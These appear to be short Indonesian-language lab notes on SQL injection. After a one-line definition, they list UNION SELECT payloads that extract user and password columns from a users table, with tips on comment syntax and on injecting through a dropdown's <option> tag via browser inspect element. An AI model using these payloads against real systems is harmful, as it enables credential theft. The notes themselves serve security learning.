SQL Injection (SQLi) adalah celah keamanan web yang memungkinkan penyerang mengintruksi query yang dibuat aplikasi untuk melihat data yang biasanya tidak dapat mereka ambil, misalnya data pengguna lain atau data lain apapun yang dapat diakses oleh aplikasi itu sendiri
Tambahkan spasi setelah --
a' UNION SELECT user, password FROM users --
q' UNION SELECT user, password FROM users #
Lakukan injeksi pada tag <option>
menggunakan inspect element di browser
1 or 1=1 UNION SELECT user, password FROM users#
1' UNION SELECT user, password FROM users#